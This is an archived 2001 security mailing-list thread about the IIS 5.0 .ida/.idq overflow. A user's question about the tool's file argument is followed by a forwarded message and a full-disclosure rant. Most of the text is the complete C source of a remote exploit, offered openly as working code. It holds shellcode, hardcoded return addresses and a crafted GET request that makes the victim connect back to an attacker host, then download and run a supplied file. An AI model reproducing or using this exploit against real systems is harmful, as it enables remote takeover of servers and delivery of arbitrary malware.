well got it compiled with no problem but what the hell does <file> do ? tried to overwrite a file in a writeable directory and then tried to create a file in a writable directory ? hmmmmm something im not seeing here ? thanks -D Marc Maiffret wrote: > This came across Steve's win2ksec mailing list almost a week or so ago. Not > sure why none of the securityfocus mailing lists have picked it up (at least > to my knowledge). Working remote IIS exploit for the .ida hole. Figured > since you guys have had a discussion about writing a exploit for it etc... > this might be helpful to you. > > Signed, > Marc Maiffret > Chief Hacking Officer > eEye Digital Security > T.949.349.9062 > F.949.349.9538 > http://eEye.com/Retina - Network Security Scanner > http://eEye.com/Iris - Network Traffic Analyzer > http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities > > ||> ----- Original Message ----- > ||> From: "Steve" <steveat_private> > ||> To: <win2ksecadviceat_private> > ||> Sent: Wednesday, June 27, 2001 2:57 PM > ||> Subject: Fwd: Full Disclosure .ida exploit. > ||> > ||> > ||> > This was sent to me a few minutes ago. Here is the code as posted to > ||> Packet Storm and a rant by the person who brought it to my attention. > ||While > ||> I normally have tried to keep rants off of the mailing list, I > ||have always > ||> been very pro full disclosure and will do my best to defend it. Please > ||> note, I have not verified this code to be functioning but will make an > ||> attempt to later this evening. If anyone else has time (Ken? Mark?) > ||please > ||> do so and post to the list. > ||> > > ||> > -Steve > ||> > > ||> > /* > ||> > IIS5.0 .idq overrun remote exploit > ||> > Programmed by hsj : 01.06.21 > ||> > > ||> > code flow: > ||> > overrun -> jmp or call ebx -> jmp 8 -> > ||> > check shellcode addr and jump to there -> > ||> > shellcode -> make back channel -> download & exec code > ||> > */ > ||> > #include <stdio.h> > ||> > #include <stdlib.h> > ||> > #include <string.h> > ||> > #include <signal.h> > ||> > #include <sys/types.h> > ||> > #include <sys/socket.h> > ||> > #include <sys/ioctl.h> > ||> > #include <sys/time.h> > ||> > #include <sys/wait.h> > ||> > #include <errno.h> > ||> > #include <unistd.h> > ||> > #include <fcntl.h> > ||> > #include <netinet/in.h> > ||> > #include <limits.h> > ||> > #include <netdb.h> > ||> > #include <arpa/inet.h> > ||> > > ||> > #define RET 0x77e516de /* jmp or call ebx */ > ||> > #define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA > ||*/ > ||> > #define GPADDRESS 0x77e59ac1 /* Address of > |GetProcAddress */ > ||> > #define GMHANDLEA_OFFSET 24 > ||> > #define GPADDRESS_OFFSET 61 > ||> > #define OFFSET 234 /* exception handler offset */ > ||> > #define NOP 0x41 > ||> > > ||> > #define MASKING 1 > ||> > #if MASKING > ||> > #define PORTMASK 0x4141 > ||> > #define ADDRMASK 0x41414141 > ||> > #define PORTMASK_OFFSET 128 > ||> > #define ADDRMASK_OFFSET 133 > ||> > #endif > ||> > > ||> > #define PORT 80 > ||> > #define ADDR "attacker.mydomain.co.jp" > ||> > #define PORT_OFFSET 115 > ||> > #define ADDR_OFFSET 120 > ||> > unsigned char shellcode[]= > ||> > "\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0" > ||> > "\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50" > ||> > "\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88" > ||> > "\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB" > ||> > "\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8" > ||> > "\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0" > ||> > "\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66" > ||> > "\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11" > ||> > #if MASKING > ||> > "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41" > ||> > #endif > ||> > "\x8B\x46\xF8\xFF\xD0\x33\xC0" > ||> > "\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07" > ||> > "\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0" > ||> > "\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B" > ||> > "\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46" > ||> > "\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0" > ||> > "\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0"; > ||> > > ||> > unsigned char storage[]= > ||> > "\xEB\x02" > ||> > "\xEB\x4E" > ||> > "\xE8\xF9\xFF\xFF\xFF" > ||> > "msvcrt.ws2_32.socket.connect.recv.closesocket." > ||> > "_open._write._close._execl."; > ||> > > ||> > unsigned char forwardjump[]= > ||> > "%u08eb"; > ||> > > ||> > unsigned char jump_to_shell[]= > ||> > "%uC033%uB866%u031F%u0340%u8BD8%u8B03" > ||> > "%u6840%uDB33%u30B3%uC303%uE0FF"; > ||> > > ||> > unsigned int resolve(char *name) > ||> > { > ||> > struct hostent *he; > ||> > unsigned int ip; > ||> > > ||> > if((ip=inet_addr(name))==(-1)) > ||> > { > ||> > if((he=gethostbyname(name))==0) > ||> > return 0; > ||> > memcpy(&ip,he->h_addr,4); > ||> > } > ||> > return ip; > ||> > } > ||> > > ||> > int make_connection(char *address,int port) > ||> > { > ||> > struct sockaddr_in server,target; > ||> > int s,i,bf; > ||> > fd_set wd; > ||> > struct timeval tv; > ||> > > ||> > s = socket(AF_INET,SOCK_STREAM,0); > ||> > if(s<0) > ||> > return -1; > ||> > memset((char *)&server,0,sizeof(server)); > ||> > server.sin_family = AF_INET; > ||> > server.sin_addr.s_addr = htonl(INADDR_ANY); > ||> > server.sin_port = 0; > ||> > > ||> > target.sin_family = AF_INET; > ||> > target.sin_addr.s_addr = resolve(address); > ||> > if(target.sin_addr.s_addr==0) > ||> > { > ||> > close(s); > ||> > return -2; > ||> > } > ||> > target.sin_port = htons(port); > ||> > bf = 1; > ||> > ioctl(s,FIONBIO,&bf); > ||> > tv.tv_sec = 10; > ||> > tv.tv_usec = 0; > ||> > FD_ZERO(&wd); > ||> > FD_SET(s,&wd); > ||> > connect(s,(struct sockaddr *)&target,sizeof(target)); > ||> > if((i=select(s+1,0,&wd,0,&tv))==(-1)) > ||> > { > ||> > close(s); > ||> > return -3; > ||> > } > ||> > if(i==0) > ||> > { > ||> > close(s); > ||> > return -4; > ||> > } > ||> > i = sizeof(int); > ||> > getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); > ||> > if((bf!=0)||(i!=sizeof(int))) > ||> > { > ||> > close(s); > ||> > errno = bf; > ||> > return -5; > ||> > } > ||> > ioctl(s,FIONBIO,&bf); > ||> > return s; > ||> > } > ||> > > ||> > int get_connection(int port) > ||> > { > ||> > struct sockaddr_in local,remote; > ||> > int lsock,csock,len,reuse_addr; > ||> > > ||> > lsock = socket(AF_INET,SOCK_STREAM,0); > ||> > if(lsock<0) > ||> > { > ||> > perror("socket"); > ||> > exit(1); > ||> > } > ||> > reuse_addr = 1; > ||> > if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char > ||> *)&reuse_addr,sizeof(reuse_addr))<0) > ||> > { > ||> > perror("setsockopt"); > ||> > close(lsock); > ||> > exit(1); > ||> > } > ||> > memset((char *)&local,0,sizeof(local)); > ||> > local.sin_family = AF_INET; > ||> > local.sin_port = htons(port); > ||> > local.sin_addr.s_addr = htonl(INADDR_ANY); > ||> > if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0) > ||> > { > ||> > perror("bind"); > ||> > close(lsock); > ||> > exit(1); > ||> > } > ||> > if(listen(lsock,1)<0) > ||> > { > ||> > perror("listen"); > ||> > close(lsock); > ||> > exit(1); > ||> > } > ||> > retry: > ||> > len = sizeof(remote); > ||> > csock = accept(lsock,(struct sockaddr *)&remote,&len); > ||> > if(csock<0) > ||> > { > ||> > if(errno!=EINTR) > ||> > { > ||> > perror("accept"); > ||> > close(lsock); > ||> > exit(1); > ||> > } > ||> > else > ||> > goto retry; > ||> > } > ||> > close(lsock); > ||> > return csock; > ||> > } > ||> > > ||> > int main(int argc,char *argv[]) > ||> > { > ||> > int i,j,s,pid; > ||> > unsigned int cb; > ||> > unsigned short port; > ||> > char *p,buf[512],buf2[512],buf3[2048]; > ||> > FILE *fp; > ||> > > ||> > if(argc!=3) > ||> > { > ||> > printf("usage: $ %s ip file\n",argv[0]); > ||> > return -1; > ||> > } > ||> > if((fp=fopen(argv[2],"rb"))==0) > ||> > return -2; > ||> > > ||> > if(!(cb=resolve(ADDR))) > ||> > return -3; > ||> > > ||> > if((pid=fork())<0) > ||> > return -4; > ||> > > ||> > if(pid) > ||> > { > ||> > fclose(fp); > ||> > s = make_connection(argv[1],80); > ||> > if(s<0) > ||> > { > ||> > printf("connect error:[%d].\n",s); > ||> > kill(pid,SIGTERM); > ||> > return -5; > ||> > } > ||> > > ||> > j = strlen(shellcode); > ||> > *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA; > ||> > *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS; > ||> > port = htons(PORT); > ||> > #if MASKING > ||> > port ^= PORTMASK; > ||> > cb ^= ADDRMASK; > ||> > *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK; > ||> > *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK; > ||> > #endif > ||> > *(unsigned short *)&shellcode[PORT_OFFSET] = port; > ||> > *(unsigned int *)&shellcode[ADDR_OFFSET] = cb; > ||> > for(i=0;i<strlen(shellcode);i++) > ||> > { > ||> > if((shellcode[i]==0x0a)|| > ||> > (shellcode[i]==0x0d)|| > ||> > (shellcode[i]==0x3a)) > ||> > break; > ||> > } > ||> > if(i!=j) > ||> > { > ||> > printf("bad portno or ip address...\n"); > ||> > close(s); > ||> > kill(pid,SIGTERM); > ||> > return -6; > ||> > } > ||> > > ||> > memset(buf,1,sizeof(buf)); > ||> > p = &buf[OFFSET-2]; > ||> > sprintf(p,"%s",forwardjump); > ||> > p += strlen(forwardjump); > ||> > *p++ = 1; > ||> > *p++ = '%'; > ||> > *p++ = 'u'; > ||> > sprintf(p,"%04x",(RET>>0)&0xffff); > ||> > p += 4; > ||> > *p++ = '%'; > ||> > *p++ = 'u'; > ||> > sprintf(p,"%04x",(RET>>16)&0xffff); > ||> > p += 4; > ||> > *p++ = 1; > ||> > sprintf(p,"%s",jump_to_shell); > ||> > > ||> > memset(buf2,NOP,sizeof(buf2)); > ||> > > ||> > ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],stor > ||age,strle > ||> n(storage)); > ||> > > ||> > ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(she > ||llcode)); > ||> > buf2[sizeof(buf2)-1] = 0; > ||> > > ||> > sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell: > ||> %s\r\n\r\n",buf,buf2); > ||> > write(s,buf3,strlen(buf3)); > ||> > > ||> > printf("---"); > ||> > for(i=0;i<strlen(buf3);i++) > ||> > { > ||> > if((i%16)==0) > ||> > printf("\n"); > ||> > printf("%02X ",buf3[i]&0xff); > ||> > } > ||> > printf("\n---\n"); > ||> > > ||> > wait(0); > ||> > sleep(1); > ||> > shutdown(s,2); > ||> > close(s); > ||> > > ||> > printf("Done.\n"); > ||> > } > ||> > else > ||> > { > ||> > s = get_connection(PORT); > ||> > j = 0; > ||> > while((i=fread(buf,1,sizeof(buf),fp))) > ||> > { > ||> > write(s,buf,i); > ||> > j += i; > ||> > printf("."); > ||> > fflush(stdout); > ||> > } > ||> > fclose(fp); > ||> > printf("\n%d bytes send...\n",j); > ||> > > ||> > shutdown(s,2); > ||> > close(s); > ||> > } > ||> > > ||> > return 0; > ||> > } > ||> > > ||> > > ||> > > ||> > > ||> > >From: fuq69rcat_private > ||> > >Date: Wed, 27 Jun 2001 13:17:57 -0800 (PDT) > ||> > >To: steveat_private > ||> > >Subject: Full Disclosure .ida exploit. > ||> > > > ||> > >Steve I hope you let this through you your win2k mailing list. I know > ||its > ||> > >a bit of a rant but I think it needs to be said and also the > |fact that > ||> there > ||> > >is a link to the .ida exploit should be worth while enough. Thanks. > ||> > >----- > ||> > >Isn't it strange that a gift can be an enemy? That a > ||privilege can be a > ||> > >chore. Maybe its just me but security is going nowhere fast because > ||> everyone > ||> > >is to busy looking at the ten thousand foot view instead of getting > ||down, > ||> > > getting their hands dirty, and fixing the problem at its core. > ||> > > > ||> > >I see everyone trying to run around and figure out what to do > ||about the > ||> > >hax0rs and the script kiddies. Bureaucrats and has never > |been security > ||> experts > ||> > >are all looking to form organizations that they hope will cut down on > ||the > ||> > >"threat" of vulnerability exposure, when thats not the real problem. > ||> Software > ||> > >companies writing insecure software IS the problem. > ||> > > > ||> > >Who gets shit on in the end? The hackers and researchers > |putting their > ||> own > ||> > >time into finding vulnerabilities in software thats been developed by > ||> multi- > ||> > >billion dollar software companies. These same hackers and researchers > ||who > ||> > >have done all of this work for FREE, to help the security community. > ||They > ||> > >end up being the ones that get shit on for releasing this information > ||to > ||> > >the masses so that they might help educate people about security > ||> vulnerabilities > ||> > >and keep software companies on their toes and honest about > ||the security > ||> > >issues that affect their software. > ||> > > > ||> > >Most software companies do not take security seriously, regardless of > ||> what > ||> > >they say, because the bean counters at most software companies never > ||see > ||> > >an ROI (Return on Investment) for adding much needed security > ||mechanisms > ||> > >to their security software. Why not? because honestly not > ||enough people > ||> > >are standing up and demanding for a change. Instead the majority of > ||> administrators, > ||> > > NT at least, tend to just laugh and say, for example, "Ahh haha > ||another > ||> > >MS hole, what's new" and then proceed to shrug it off, stay > |bent over, > ||> and > ||> > >keep taking it from software companies. > ||> > > > ||> > >Also for those administrators that actually do care about security > ||you'll > ||> > >tend to find that a lot of them are actually paranoid about > |installing > ||> security > ||> > >patches from companies like Microsoft because they've had a > |really bad > ||> track > ||> > >record on creating patches that end up breaking and then need patches > ||> themselves. > ||> > >So the administrators end up waiting for the next service pack (which > ||> leaves > ||> > >them vulnerable), UNLESS they have a full disclosure example exploit > ||that > ||> > >first hand shows them how serious the vulnerability is, at > |which point > ||I > ||> > >promise you they WILL install the patch. > ||> > > > ||> > >I could go on forever about the circles the security industry is > ||running > ||> > >in or how 80% of the "security experts" have never done ANYTHING to > ||help > ||> > >security (hi russ!!) besides spout off their mouth about topics they > ||> usually > ||> > >have never really experienced first hand. > ||> > > > ||> > >A handful of people, like Russ Cooper, have said that when people > ||release > ||> > >non-malicious example exploits that it makes it easier for people to > ||take > ||> > >those exploits and tweak them into doing bad things. That is > ||completely > ||> > >inaccurate and its a statement being made by someone who > |wouldn't know > ||> what > ||> > >an exploit was if shellcode slapped him in the face. > ||> > > > ||> > >I came across this the other day on packetstorm. Working .ida exploit > ||> which > ||> > >is probably one of the first publicly released, although as > ||always when > ||> > >any big hole is released and you don't see exploits on > |Bugtraq or what > ||> not > ||> > >that MEANS thats because people aren't sharing their exploits with > ||> everyone > ||> > >but they are out there and most likely being used. > ||> > > > ||> > > ||> > ||>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&u > ||name=anon > ||> ymous&datopic=General&mesgcheck=defined&gum=3087&editoron= > ||> > > > ||> > >There is a whole other world out there that few people can even begin > ||to > ||> > >understand. Exploits are created daily for all types of > ||vulnerabilities > ||> > >that people might have a use for. Just because you dont see it on the > ||> handful > ||> > >of security mailing lists, or because CERT, NIPC, or Russ Cooper have > ||not > ||> > >heard about it does not mean it is not there. > ||> > > > ||> > >All those opposed to full disclosure, be damned. For to resist is to > ||piss > ||> > >against the wind and all who do will end up smelling. > ||> > >Free, encrypted, secure Web-based email at www.hushmail.com > ||> > > ||> > _____________________________________________________________________ > ||> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" > ||> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" > ||> > SEND ALL COMMANDS TO: listservat_private > ||> > > ||> > ||> > || > || -- ------------------------------ Christopher M Downs Network Security Administrator Skillsoft Corporation cdownsat_private "Micro$oft typed backwards spells "c:\duh /?" ------------------------------ -------------------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Tue Jul 03 2001 - 14:09:15 PDT